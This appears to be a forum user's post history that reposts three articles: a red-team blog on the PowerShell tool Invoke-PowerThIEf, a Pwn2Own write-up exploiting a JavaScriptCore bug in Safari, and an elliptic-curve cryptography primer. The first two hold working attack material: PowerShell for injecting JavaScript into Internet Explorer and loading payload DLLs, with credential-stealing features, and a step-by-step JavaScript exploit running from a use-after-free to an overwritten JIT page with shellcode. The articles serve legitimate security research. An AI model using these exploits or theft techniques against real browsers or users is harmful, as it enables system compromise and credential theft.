Everything posted by Nytro
-
COM and the PowerThIEf

Tuesday 10 July 2018, by Rob Maslen

Recently, Component Object Model (COM) has come back in a big way, particularly with regards to its use for persistence and lateral movement. In this blog we will run through how it can also be used for limited process migration and JavaScript injection within Internet Explorer. We will then finish with how this was put together in our new PowerShell library, Invoke-PowerThIEf, and run through some situations in which it can aid you, the red team. Earlier this year I became aware of a technique involving Junction Folders/CLSIDs that had been leaked in the Vault 7 dump. It was while looking at further applications of these that I also learned about COM's ability to interact with and automate Internet Explorer. This, of course, is not a new discovery; a lot of the functionality is well documented on sites like CodeProject. However, it had not been organised into a library that would aid the red team workflow. This formed the basis of my talk "COM and the PowerThIEf" at SteelCon in Sheffield on 7th July 2018. The slides for the talk can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Steelcon-2018-com-powerthief-final.pdf

Getting up to speed with COM

Before we dive into this, if you are not familiar with COM then I would highly recommend the following resources, a selection of recent excellent talks and blog posts on the subject:
- COM in 60 Seconds by James Forshaw – https://vimeo.com/214856542
- Windows Archaeology by Casey Smith & Matt Nelson – https://www.youtube.com/watch?v=3gz1QmiMhss
- Lateral Movement using Excel Application and DCOM by Matt Nelson – https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

Junction Folders

I first came across the Junction Folders/CLSID technique mentioned above in one of b33f's excellent Patreon videos. As I understand it, this was first used as a method for persistence: if you name a folder in the format CLSID.{<CLSID>}, then when you navigate to that folder, Explorer will look the CLSID up in the registry and run whatever COM server has been registered. As part of his DEF CON 25 workshop (which is worth a read, hosted at https://github.com/FuzzySecurity/DefCon25), he released a tool called Hook-InProcServer that enables you to build the registry structure required for a COM hijack or for the Junction Folders/CLSID technique. Both of these were being used as persistence mechanisms, and I began wondering whether this might also be usable as a means of process migration, at least into explorer.exe. Step one was to find out whether it is possible to programmatically navigate to one of the configured folders – and yes, it turns out that it is. In order to navigate, we first need to gain access to any running instances of Explorer. Windows makes this easy via the ShellWindows object: https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx. Enumerating the Item property on this object lists all the currently running instances of Explorer and Internet Explorer (I must admit I thought this was curious behaviour). ShellWindows is identified by the CLSID "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"; the following PowerShell demonstrates activating it.
```powershell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
```

The objects returned by indexing the .Item collection will differ depending on whether the instance is Explorer or Internet Explorer. An easy check is the FullName property, which exists on both and contains the path of the application, as shown here:

```powershell
$fileName = [System.IO.Path]::GetFileNameWithoutExtension($shWin[0].FullName)
if ($fileName.ToLower().Equals("iexplore"))
{
    # Do your IE stuff here
}
```

This article (https://www.thewindowsclub.com/the-secret-behind-the-windows-7-godmode) from 2010 not only contains the Vault 7 technique but also shows that it is possible to navigate to a CLSID using the syntax shell:::{CLSID}. Assuming that we have at least one IE window open, we can index the ShellWindows.Item collection to gain access to that window (e.g. $shWin[0] for the first IE window). This provides us an object that represents that instance of IE and is of a type called IWebBrowser2. Looking further into this type, we find in the documentation that it has a method called Navigate2 (https://msdn.microsoft.com/en-us/library/aa752134(v=vs.85).aspx). The remarks on the MSDN page for this method state that it was added to extend the Navigate method in order to "allow for shell integration". The following code activates ShellWindows, assumes the first window is an IE instance (this is a proof of concept) and then attempts to navigate to the Control Panel via the CLSID for Control Panel (which can be found in the registry).
```powershell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{ED7BA470-8E54-465E-825C-99712043E01C}", 2048)
<#
The CLSID must be in the format "shell:::{CLSID}".
The second parameter, 2048, is the BrowserNavConstants value for navOpenInNewTab:
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use:
https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
#>
```

The following animation shows what happens when this code is run:

Control Panel being navigated to via its CLSID

We can then see via a trace from Process Monitor that IE has looked up the CLSID and navigated to it, eventually opening it up in Explorer, which involved loading the DLL referenced by the InProcServer registry key. If we create our own registry keys, we then have a method of asking IE (or Explorer) to load a DLL for us, all from the comfort of another process. We don't always want network connections going out from Word.exe, do we? In the case of IE the DLL must be x64. There are also methods of configuring the registry entries to execute script; I suggest that you look at subTee's or bohops' excellent work for further information.

JavaScript

Once a reference to an Internet Explorer window is obtained, it is possible to access the DOM of that instance. As expected, you then have full access to the page and browser. You can view and edit HTML, inject JavaScript, navigate to other tabs, and show or hide the window, for example.
The following code snippet demonstrates how it is possible to inject and execute JavaScript:

```powershell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$parentwin = $shWin[0].Document.parentWindow
$parentwin.GetType().InvokeMember("eval", [System.Reflection.BindingFlags]::InvokeMethod, $null, $parentwin, @("alert('Self XSS, meh \r\n\r\n from '+ document.location.href)"))
```

The difference this time is that we actually have to locate the eval method on the DOM window before being able to call it. This requires using .NET's Reflection API to locate and invoke the method. The following shows what happens when this code is run.

Where is this all going? Well, despite the programming constructs and some of the techniques being well documented, there didn't appear to be a library out there which brought it all together in order to help a red team in the following situations:

- The target is using a password manager, e.g. LastPass, where key-logging is ineffective.
- The user is logged into an application and we want to be able to log them out without having to clear all browser history and cookies.
- The target application is in a background tab and we can't wait for the user to switch tabs; we need to view or get HTML from that page.
- We want to view a site from the target's IP address, without the target being aware.

This led to me writing the PowerThIEf library, which is now hosted at https://github.com/nettitude/Invoke-PowerThIEf. The functionality included in the initial release is as follows:

- DumpHtml: retrieves HTML from the DOM; can use some selectors (but not jQuery style – yet).
- ExecPayload: uses the migration technique from earlier to launch a payload DLL in IE.
- HookLoginForms: steals credentials by hooking the login form and monitoring for new windows.
- InvokeJS: executes JavaScript in the window of your choice.
- ListUrls: lists the URLs of all currently opened tabs/windows.
- Navigate: navigates to another URL.
- NewBackgroundTab: creates a new tab in the background.
- Show/HideWindow: shows or hides a browsing window.

Examples of usage and functionality include: extracting HTML from a page; logging the user out in order to capture credentials; using the junction folders to trigger a PoshC2 payload; and capturing credentials entered via LastPass, in transit.

Usage

The latest Invoke-PowerThIEf documentation can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/README.md

Roadmap

Further functionality is planned and will include:

- Screenshot: screenshot all the browser windows.
- CookieThIEf: steal cookies (including session cookies).
- Refactored DOM event handling: developing complex C# wrapped in PowerShell is not ideal.
- A pure C# module.
- Support for .NET 2.0-3.5.

Download

GitHub: https://github.com/nettitude/Invoke-PowerThIEf

Source: https://labs.nettitude.com/blog/com-and-the-powerthief/
-
Weaponization of a JavaScriptCore Vulnerability

Illustrating the Progression of Advanced Exploit Primitives In Practice

July 11, 2018 / Nick Burnett, Patrick Biernat, Markus Gaasedelen

Software bugs come in many shapes and sizes. Sometimes, these code defects (or 'asymmetries') can be used to compromise the runtime integrity of software. This distinction is what helps researchers separate simple reliability issues from security vulnerabilities. At the extreme, certain vulnerabilities can be weaponized by meticulously exacerbating such asymmetries to reach a state of catastrophic software failure: arbitrary code execution. In this post, we shed some light on the process of weaponizing a vulnerability (CVE-2018-4192) in the Safari Web Browser to achieve arbitrary code execution from a single click by an unsuspecting victim. This is the most frequently discussed topic of the exploit development lifecycle, and the fourth post in our Pwn2Own 2018 series.

A weaponized version of CVE-2018-4192, executing arbitrary code against JavaScriptCore in early 2018

If you haven't been following along, you can read about how we discovered this vulnerability, followed by a walkthrough of its root cause analysis. The very first post of this series provides a top-level discussion of the full exploit chain.

Exploit Primitives

While developing exploits against hardened or otherwise complex software, it is often necessary to use one or more vulnerabilities to build what are known as 'exploit primitives'. In layman's terms, a primitive refers to an action that an attacker can perform to manipulate or disclose the application runtime (e.g., memory) in an unintended way. As the building blocks of an exploit, primitives are used to compromise software integrity or bypass modern security mitigations through advanced (often arbitrary) modifications of runtime memory.
It is not uncommon for an exploit to string together multiple primitives towards the ultimate goal of achieving arbitrary code execution.

The metamorphosis of software vulnerabilities, by Joe Bialek & Matt Miller (slides 6-10)

In the general case, it is impractical (if not impossible) to defend real-world applications against an attacker who can achieve an 'Arbitrary Read/Write' primitive. Arbitrary R/W implies an attacker can perform any number of reads or writes across the entire address space of the application's runtime memory. While extremely powerful, an arbitrary R/W is a luxury and not always feasible (or necessary) for an exploit. But when present, it is widely recognized as the point from which total compromise (arbitrary code execution) is inevitable.

Layering Primitives

From an educational perspective, the JavaScriptCore exploit that we developed for Pwn2Own 2018 is a great illustration of what layering increasingly powerful primitives looks like in practice. Starting from the discovered vulnerability, we have broken our JSC exploit down into approximately six phases, through which we nurtured each of our exploit primitives:

1. Forcefully free a JSArray butterfly using our race condition vulnerability (UAF)
2. Employ the freed butterfly to gain a relative Read/Write (R/W) primitive
3. Create generic addrof(...) and fakeobj(...) exploit primitives using the relative R/W
4. Use the generic exploit primitives to build an arbitrary R/W primitive from a faked TypedArray
5. Leverage our arbitrary R/W primitive to overwrite a Read/Write/Execute (RWX) JIT page
6. Execute arbitrary code from said JIT page

Each of these steps required us to study a number of different JavaScriptCore internals, learned through careful review of the WebKit source code, existing literature, and hands-on experimentation. We will cover some of these internals in this post, but mostly in the context of how they were leveraged to build our exploit primitives.
UAF Target Selection

From the last post, we learned that the discovered race condition could be used to prematurely free any type of JS object by putting it in an array and calling array.reverse() at a critical moment. This can create a malformed runtime state in which a freed object may continue to be used, in what is called a 'Use-After-Free' (UAF). We can think of this ability to incorrectly free arbitrary JS objects (or their internal allocations) as a class-specific exploit primitive against JSC. The next step is to identify an interesting object to target (and free). In exploit development, array-like structures that maintain an internal 'length' field are attractive to attackers. If a malicious actor can corrupt these dynamic length fields, they are often able to index the array far outside of its usual bounds, creating a more powerful exploit primitive.

Corrupting a length field in an array-like structure can allow for Out-of-Bounds array manipulations

Within JavaScriptCore, a particularly interesting and accessible construct that matches the pattern depicted above is the backing butterfly of a JSArray object. The butterfly is a structure used by JSC to store JS object properties and data (such as array elements), but it also maintains a length field to bound user access to its storage. As an example, the following gdb dump and diagram show a JSArray with its backing store (a butterfly) that we have filled with floats (represented by 0x4141414141414141...). The green fields depict the internally managed size fields of the backing butterfly:

Dumping a JSArray, and depicting the relationship with its backing butterfly

In the Phrack article Attacking JavaScript Engines (section 1.2), saelo describes butterflies in greater detail: "Internally, JSC stores both [JS object] properties and elements in the same memory region and stores a pointer to that region in the object itself.
This pointer points to the middle of the region, properties are stored to the left of it (lower addresses) and elements to the right of it. There is also a small header located just before the pointed to address that contains the length of the element vector. This concept is called a "Butterfly" since the values expand to the left and right, similar to the wings of a butterfly."

In the next section, we will attempt to forcefully free a butterfly using our vulnerability. This will leave a dangling butterfly pointer within a live JSArray, prone to malicious re-use (UAF).

Forcing a Useful UAF

Due to the somewhat chaotic nature of our race condition, we will want to start our exploit (written in JavaScript) by constructing a top-level array that contains a large number of simple 'float arrays' to better our chances of freeing at least one of them (e.g. 'winning the race'):

```javascript
print("Initializing arrays...");
var someArray1 = Array(1024);
for (var i = 0; i < someArray1.length; i++)
    someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x4141414141414141
...
```

Note that the use of floats is somewhat common in browser exploits because they are one of the few native 64-bit JS types. It allows one to read or write arbitrary 64-bit values (contiguously) to the backing array butterfly, which will be more relevant later on in this post. With our target arrays allocated as elements of someArray1, we attempt to trigger the race condition through repeated use of array.reverse() and stimulation of the GC (to help schedule mark-and-sweeps):

```javascript
...
print("Starting race...");
v = []
for (var i = 0; i < 506; i++) {
    for (var j = 0; j < 0x20; j++)
        someArray1.reverse()
    v.push(new String("C").repeat(0x10000)) // stimulate the GC
}
...
```

If successful, we expect to have freed one or more of the backing butterflies used by the float arrays stored within someArray1.
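The float constants in these snippets are simply 64-bit patterns viewed as IEEE 754 doubles. The exploit itself relies on an Int64 helper class for such conversions; as a standalone illustration of ours (not part of the exploit), the encoding can be checked in plain Node using BigInt and a shared buffer:

```javascript
// Reinterpret a 64-bit bit pattern as a double, and back, via one buffer.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

function bitsToDouble(bits) { u64[0] = bits; return f64[0]; }
function doubleToBits(d)    { f64[0] = d;    return u64[0]; }

// The PoC's fill value decodes to repeated 0x41 ('A') bytes:
console.log(bitsToDouble(0x4141414141414141n));             // 2261634.5098039214
console.log(doubleToBits(2261634.5098039214).toString(16)); // "4141414141414141"
```

Writing that innocuous-looking float into an array element therefore plants the attacker-chosen byte pattern directly in the backing butterfly.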
Visually, our results will look something like this:

The race condition will free some butterflies on the heap, while leaving their JSArray cells intact

While driving the race condition, the JSArray v will eventually grow its backing butterfly (through pushes) such that its backing butterfly can get allocated over some of the freed butterfly allocations.

The backing butterfly for 'v' should eventually get re-allocated over some of the freed butterflies

To confirm this hypothesis, we can inspect the lengths of all the arrays we targeted with our race condition. If successful, we expect to find one or more arrays with an abnormal length. This is an indication that the butterfly has been freed, and that it is now a dangling pointer into memory owned by a new object (specifically, v).

```javascript
...
print("Checking for abnormal array lengths...");
for (var i = 0; i < someArray1.length; i++) {
    if (someArray1[i].length == 128) // ignore arrays of expected length...
        continue;
    print('len: 0x' + someArray1[i].length.toString(16));
}
```

The snippets provided in this section make up a new Proof-of-Concept (PoC) called x.js. Running this short script a few times, it can be observed that the vulnerability pretty reliably reports multiple JSArrays with abnormal lengths. This is evidence that the backing butterflies for some of our arrays have been freed through the race condition, losing ownership of their underlying data (which now belongs to v).

The PoC prints abnormal array lengths found during each run, implying potentially unbounded (malformed) arrays

Explicitly, we have used the race condition to force a UAF of one or more (random) JSArray butterflies, and now the dangling butterfly pointers are pointing at unknown data. We have used our race condition to overlay a larger (living) allocation v with one or more freed butterflies.
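The overlap itself can be modelled in plain Node with two typed-array views over one buffer: a Uint32Array stands in for the dangling butterfly (whose 32-bit length header sits at offset 0), and a Float64Array stands in for v's new butterfly landing on top of it. This is our own toy sketch of the mechanics, not engine code, and it assumes a little-endian host (as on x86/ARM):

```javascript
const heap = new ArrayBuffer(64);                 // stands in for the reused heap chunk
const danglingButterfly = new Uint32Array(heap);  // freed butterfly: index 0 ~ length header
const vButterfly = new Float64Array(heap);        // v's butterfly, attacker-filled

// Fill "v" with the double whose bit pattern is 0x4242424242424242...
vButterfly.fill(156842099844.51764);

// ...and the dangling view now sees a corrupted 32-bit "length".
console.log(danglingButterfly[0].toString(16));   // "42424242"
```

Writing floats through one view rewrites the header another view trusts, which is exactly what filling v does to the freed butterflies beneath it.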
From this point, it is easy to demonstrate full control over the 'abnormal' array lengths teased above to achieve what is known as a 'relative R/W' exploit primitive.

Relative R/W Primitive

By filling the larger overlaid butterfly v with arbitrary data (in this case, floats), we are able to set the 'length' property pointed at by one or more of the freed JSArray butterflies. The code for this is only one additional line inserted into our PoC (v.fill(...)). Putting it all together, this is approximately what we have sketched out so far:

```javascript
print("Initializing arrays...");
var someArray1 = Array(1024);
for (var i = 0; i < someArray1.length; i++)
    someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x4141414141414141

print("Starting race...");
v = []
for (var i = 0; i < 506; i++) {
    for (var j = 0; j < 0x20; j++)
        someArray1.reverse()
    v.push(new String("C").repeat(0x10000)) // stimulate the GC
}

print("Filling overlapping butterfly with 0x42424242...");
v.fill(156842099844.51764)

print("Checking for abnormal array lengths...");
for (var i = 0; i < someArray1.length; i++) {
    if (someArray1[i].length == 128) // ignore arrays of expected length...
        continue;
    print('len: 0x' + someArray1[i].length.toString(16));
}
```

Executing this new PoC a few times, we reliably see multiple arrays claiming to have a length of 0x42424242. A corrupted or otherwise radically incorrect array length should be alarming to any developer.

The PoC reliably printing multiple arrays with an attacker-controlled (unbounded) length

These 'malformed' (dangling) array butterflies are no longer bounded by a valid length. By pulling one of these malformed JSArray objects out of someArray1 and using it as one normally would, we can now index far past its 'expected' length to read or write nearby (relative) heap memory.
```javascript
// pull out one of the arrays with an 'abnormal' length
oob_array = someArray1[i];

// write the value 0x41414141 to array index 999999 (Out-of-Bounds Write)
oob_array[999999] = 0x41414141;

// read memory from index 987654321 of the array (Out-of-Bounds Read)
print(oob_array[987654321]);
```

Being able to read or write Out-of-Bounds (OOB) is an extremely powerful exploit primitive. As an attacker, we can now peek and poke at other parts of runtime memory almost as if we were using a debugger. We have effectively broken the fourth wall of the application runtime.

Limitations of a Relative R/W

Unfortunately, there are several factors inherent to JSArrays that limit the utility of the relative R/W primitive we established in the previous section. Chief among these limitations is that the length attribute of the JSArray is stored and used as a 32-bit signed integer. This is a problem because it means we can only index 'forwards' out of bounds, to read or write heap data that is close behind our butterfly. This leaves a significant portion of runtime memory inaccessible to our relative R/W primitive.

```javascript
// relative access limited to 0-0x7FFFFFFF forward from the malformed array
print(oob_array[-1]);             // bad index (undefined)
print(oob_array[0]);              // okay
print(oob_array[10000000]);       // okay
print(oob_array[0x7FFFFFFF]);     // okay
print(oob_array[0xFFFFFFFF]);     // bad index (undefined)
print(oob_array[0xFFFFFFFFFFF]);  // bad index (undefined)
```

Our next goal is to build up to an arbitrary R/W primitive such that we can touch memory anywhere in the 64-bit address space of the application runtime. With JavaScriptCore, there are a few different documented techniques to achieve this level of ubiquity, which we will discuss in the next section.

Utility of TypedArrays

In the JavaScript language specification, there is a family of objects called TypedArrays. These are array-like objects that allow JS developers to exercise more precise and efficient control over memory through lower-level data types.
TypedArrays were added to JavaScript to facilitate scripts which perform audio, video, and image manipulation from within the browser. It is both more natural and more performant to implement these types of computations with direct memory manipulation or storage. For these same reasons, TypedArrays are often an interesting tool for exploit writers. The structure of a TypedArray (in the context of JavaScriptCore) is comprised of the following components:

- A JSCell, similar to all other JSObjects
- An unused butterfly pointer field
- A pointer to the underlying 'backing store' for the TypedArray's data
- The backing store length
- Mode flags

Critically, the backing store is where the user data stored into a TypedArray object is actually located in memory. If we can overwrite a TypedArray's backing store pointer, it can be pointed at any address in memory.

A diagram of the TypedArray JSObject in memory, with its underlying backing store

The simplest way to achieve arbitrary R/W would be to allocate a TypedArray object somewhere after our malformed JSArray, and then use our relative R/W to modify the backing store pointer to an address of our choosing. By reading or writing to index 0 of the TypedArray, we would then interface with the memory at the specified address directly.

Arbitrary R/W can be achieved by overwriting the backing store pointer within a TypedArray

With little time to study the JSC heap and garbage collector algorithms, it proved difficult for us to place a TypedArray near our relative R/W through pure heap feng-shui. Instead, we employed documented exploitation techniques to create a 'fake' TypedArray and achieve the same result.

Generic Exploit Primitives

Faking our own TypedArray requires more work than a lucky heap allocation, but it should be significantly more reliable (and deterministic) in practice. The ability to craft fake JS objects is dependent on two higher-level 'generic' exploit primitives that we must build using our relative R/W: addrof(...)
to provide us the memory address of any JavaScript object we give it, and fakeobj(...) to take a memory address and return a JavaScript object at that location.

To create our addrof(...) primitive, we first create a normal JSArray (oob_target) whose butterfly is located after our corrupted JSArray butterfly (the relative R/W). From JavaScript, we can then place any object into the first index of the array [A] and use our relative R/W primitive oob_array to read the address of the stored object pointer (as a float) out of the nearby array (oob_target) [B]. Decoding the float from its IEEE 754 form gives us the JSObject's address in memory:

```javascript
// Get the address of a given JSObject
prims.addrof = function(x) {
    oob_target[0] = x;                                    // [A]
    return Int64.fromDouble(oob_array[oob_target_index]); // [B]
}
```

By doing the reverse, we can establish our fakeobj(...) primitive. This is achieved by using our relative R/W (oob_array) to write a given address into the oob_target array butterfly (as a float) [C]. Reading that array index from JavaScript will then return a JSObject for the pointer we stored [D]:

```javascript
// Return a JSObject at a given address
prims.fakeobj = function(addr) {
    oob_array[oob_target_index] = addr.asDouble(); // [C]
    return oob_target[0];                          // [D]
}
```

Using our relative R/W primitive, we have created some higher-level generic exploit primitives that will help us in creating fake JavaScript objects. It is almost as if we have extended the JavaScript engine with new features! Next, we will demonstrate how these two new primitives can be used to help build a fake TypedArray object. This is what will lead us to a true arbitrary R/W primitive.

Arbitrary R/W Primitive

Our process for creating a fake TypedArray is taken directly from the techniques shared in the Phrack article referenced previously in this post. To be comprehensive, we discuss our use of these methods here. To simplify the process of creating a fake TypedArray, we constructed it 'inside' a standard JSObject.
The 'container' object we created was of the form:

```javascript
let utarget = new Uint8Array(0x10000);
utarget[0] = 0x41;

// Our fake array
// Structure id guess is 0x200
// [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite) ]
let jscell = new Int64('0x0118270000000200');

// Construct the object
// Each attribute will set 8 bytes of the fake object inline
obj = {
    // JSCell
    'a': jscell.asDouble(),

    // Butterfly can be anything (unused)
    'b': false,

    // Target we want to write to (the 'backing store' field)
    'c': utarget,

    // Length and flags
    'd': new Int64('0x0001000000000010').asDouble()
};
```

Using a JSObject in this way makes it easy for us to set or modify any of the object's contents at will. For example, we can easily point the 'backing store' (our arbitrary R/W) at any JS object by placing that object in the mock backing store field. Of these items, the JSCell is the most complex to fake. Specifically, the structureID field of the JSCell is problematic. At runtime, JSC generates a unique structureID for each class of JavaScript object. This ID is used by the engine to determine the object's type, how it should be handled, and all of its attributes. At runtime, we don't know what the structureID for a TypedArray is. To get around this issue, we need some way to help ensure that we can "guess" a valid structureID for the type of object we want. Due to some low-level behaviour inherent to JavaScriptCore, if we create a TypedArray object and then add at least one custom attribute to it, JavaScriptCore will assign it a unique structureID. We abused this fact to 'spray' these IDs, making it fairly likely that we could reliably guess an ID (say, 0x200) that corresponded to a TypedArray.
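To see where that guessed structureID lives inside the fake JSCell, the 64-bit header constant can be unpacked field by field, following the layout annotated in the exploit's own comment (low 32 bits: structureID; then one byte each of indexing type, m_type, m_flags, m_cellState). This decoding sketch is ours, runnable in Node:

```javascript
// Unpack the fake JSCell header used above into its annotated fields.
const header = 0x0118270000000200n;

const structureID  = Number(header & 0xffffffffn);    // 0x200: the sprayed guess
const indexingType = Number((header >> 32n) & 0xffn); // 0
const jsType       = Number((header >> 40n) & 0xffn); // 0x27: float array
const flags        = Number((header >> 48n) & 0xffn); // 0x18: OverridesGetOwnPropertySlot
const cellState    = Number((header >> 56n) & 0xffn); // 1: NewWhite

console.log(structureID.toString(16)); // "200"
```

Everything in the header except the structureID can be written with confidence; the ID itself is the one field that has to be guessed, which is what the spray below addresses.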
```javascript
// Here we will spray structure IDs for Float64Arrays
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function sprayStructures() {
    function randomString() {
        return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5);
    }
    // Spray arrays for structure id
    for (let i = 0; i < 0x1000; i++) {
        let a = new Float64Array(1);
        // Add a new property to create a new Structure instance.
        a[randomString()] = 1337;
        structs.push(a);
    }
}
```

After spraying a large number of TypedArray structure IDs, we created a fake TypedArray and guessed a reasonable value for its structureID. We can safely 'check' whether we guessed correctly by testing the fake TypedArray object with instanceof. If the object checks out as an instance of Float64Array, we know we have created a 'valid-enough' TypedArray object! At this point, we have access to a fake TypedArray from JavaScript, while simultaneously having control over its backing store pointer through utarget. Manipulating the backing store pointer of this TypedArray grants us full read/write access to the entire address space of the process.

```javascript
// Set data at a given address
prims.set = function(addr, arr) {
    fakearray[2] = addr.asDouble();
    utarget.set(arr);
}

// Read 8 bytes as an Int64 at a given address
prims.read64 = function(addr) {
    fakearray[2] = addr.asDouble();
    let bytes = Array(8);
    for (let i = 0; i < 8; i++) {
        bytes[i] = utarget[i];
    }
    return new Int64(bytes);
}

// Write an Int64 as 8 bytes at a given address
prims.write64 = function(addr, value) {
    fakearray[2] = addr.asDouble();
    utarget.set(value.bytes);
}
```

With our arbitrary R/W capability in hand, we can work towards our final goal: arbitrary code execution.

Arbitrary Code Execution

On macOS, Safari/JavaScriptCore still uses Read/Write/Execute (RWX) JIT pages. To achieve code execution, we can simply locate one of these RWX JIT pages and overwrite it with our own shellcode. The first step is to find a pointer to one of these JIT pages.
To do this, we created a JavaScript function object and used it a few times. This ensures the function object has its logic compiled down to machine code and assigned a region in the RWX JIT pages:

```javascript
// Build an arbitrary JIT function
// This was basically just random junk to make the JIT function larger
let jit = function(x) {
    var j = [];
    j[0] = 0x6323634;
    return x*5 + x - x*x /0x2342513426 +(x-x+0x85720642*(x+3-x / x+0x41424344)/0x41424344)+j[0];
};

// Make sure the JIT function has been compiled
jit();
jit();
jit();
...
```

We then used our arbitrary R/W primitive and addrof(...) to inspect the function object jit. Traditionally, the object's RWX JIT page pointer can be found somewhere within the function object. In early January, however, a 'pointer poisoning' patch was introduced into JavaScriptCore to mitigate the Spectre CPU side-channel issues. This was not designed to hide pointers from an attacker with arbitrary R/W, but we are now required to dig a bit deeper through the object for an un-poisoned JIT pointer.

```javascript
// Traverse the JSFunction object to retrieve a non-poisoned pointer
log("Finding jitpage");
let jitaddr = prims.read64(
    prims.read64(
        prims.read64(
            prims.read64(
                prims.addrof(jit).add(3*8)
            ).add(3*8)
        ).add(3*8)
    ).add(5*8)
);
log("Jit page addr = " + jitaddr);
...
```

Now that we have a pointer to an RWX JIT page, we can simply plug it into the backing store field of our fake TypedArray and write to it (arbitrary write). The final caveat we have to be mindful of is the size of our shellcode payload. If we copy too much code, we may inadvertently 'smash' through other JIT'd functions with our arbitrary write, introducing undesirable instability.

```javascript
shellcode = [0xcc, 0xcc, 0xcc, 0xcc]

// Overwrite the JIT code with our INT3s
log("Writing shellcode over jit page");
prims.set(jitaddr.add(32), shellcode);
...
```

To gain code execution, we simply call the corresponding function object from JavaScript.
// Call the JIT function to execute our shellcode
log("Calling jit function");
jit();

Running the full exploit against JSC release, we can see that our Trace/Breakpoint (cc shellcode) is being executed. This implies we have achieved arbitrary code execution.

The final exploit demonstrating arbitrary code execution against a release build of JavaScriptCore on Ubuntu 16.04

Having completed the exploit, with a little more work an attacker could embed this JavaScript in any website to pop vulnerable versions of Safari. Given more research & development time, this vulnerability could probably be exploited with a >99% success rate. The last step involves wrapping this JavaScript-based exploit in HTML, and tuning timing and figures slightly such that it works more reliably when targeting Apple Safari running on real Mac hardware. A victim could experience complete compromise of their browser by simply clicking the wrong link, or navigating to a malicious website.

Conclusion

With little prior knowledge of JavaScriptCore, this vulnerability took approximately 100 man-hours to study, weaponize, and stabilize from discovery. In our testing leading up to Pwn2Own 2018, we measured the success rate of our Safari exploit at approximately 95% across 1000+ runs on a 13 inch, i5, 2017 MacBook Pro that we bought for testing. At Pwn2Own 2018, the JSC exploit landed successfully against a 13 inch, i7, 2017 MacBook Pro on three of four attempts, with the race condition failing entirely on the second attempt (possibly exacerbated by the i7).

The next step in the zero-day chain is escaping the Safari sandbox to compromise the entire machine. In the next post, we will discuss our process of evaluating the sandbox to identify a vulnerability that led to a root-level privilege escalation against the system.

Sursa: https://blog.ret2.io/2018/07/11/pwn2own-2018-jsc-exploit/
-
Introducing Elliptic Curves Posted on February 8, 2014 by j2kun With all the recent revelations of government spying and backdoors into cryptographic standards, I am starting to disagree with the argument that you should never roll your own cryptography. Of course there are massive pitfalls and very few people actually need home-brewed cryptography, but history has made it clear that blindly accepting the word of the experts is not an acceptable course of action. What we really need is more understanding of cryptography, and implementing the algorithms yourself is the best way to do that. [1] For example, the crypto community is quickly moving away from the RSA standard (which we covered in this blog post). Why? It turns out that people are getting just good enough at factoring integers that secure key sizes are getting too big to be efficient. Many experts have been calling for the security industry to switch to Elliptic Curve Cryptography (ECC), because, as we’ll see, the problem appears to be more complex and hence achieves higher security with smaller keys. Considering the known backdoors placed by the NSA into certain ECC standards, elliptic curve cryptography is a hot contemporary issue. If nothing else, understanding elliptic curves allows one to understand the existing backdoor. I’ve seen some elliptic curve primers floating around with all the recent talk of cryptography, but very few of them seem to give an adequate technical description [2], and legible implementations designed to explain ECC algorithms aren’t easy to find (I haven’t found any). So in this series of posts we’re going to get knee deep in a mess of elliptic curves and write a full implementation. If you want motivation for elliptic curves, or if you want to understand how to implement your own ECC, or you want to understand the nuts and bolts of an existing implementation, or you want to know some of the major open problems in the theory of elliptic curves, this series is for you. 
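Before the series begins, here is a small taste of the object of study: a sketch (my own toy parameters, not code from the series) of checking whether a point satisfies a short Weierstrass curve equation over a small finite field.

```python
# Toy short Weierstrass curve y^2 = x^3 + a*x + b over GF(p)
# (illustrative parameters only -- far too small for real cryptography)
p, a, b = 17, 0, 7

def on_curve(P):
    if P is None:        # None stands for the point at infinity
        return True
    x, y = P
    return (y * y - (x ** 3 + a * x + b)) % p == 0

print(on_curve((1, 5)))  # True: 5^2 = 25, 1^3 + 7 = 8, and 25 ≡ 8 (mod 17)
print(on_curve((2, 3)))  # False
```

The group law that makes such points useful for cryptography — how two points are "added" — is exactly what the early posts in the series develop.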
The series will have the following parts:

1. Elliptic curves as elementary equations
2. The algebraic structure of elliptic curves
3. Points on elliptic curves as Python objects
4. Elliptic curves over finite fields
5. Finite fields primer (just mathematics)
6. Programming with finite fields
7. Back to elliptic curves
8. Diffie-Hellman key exchange
9. Shamir-Massey-Omura encryption and Digital Signatures

Along the way we'll survey a host of mathematical topics as needed, including group theory, projective geometry, and the theory of cryptographic security. We won't assume any familiarity with these topics ahead of time, but we do intend to develop some maturity through the post without giving full courses on the side-topics. When appropriate, we'll refer to the relevant parts of the many primers this blog offers. A list of the posts in the series (as they are published) can be found on the Main Content page. And as usual all programs produced in the making of this series will be available on this blog's Github page.

For anyone looking for deeper mathematical information about elliptic curves (more than just cryptography), you should check out the standard book, The Arithmetic of Elliptic Curves.

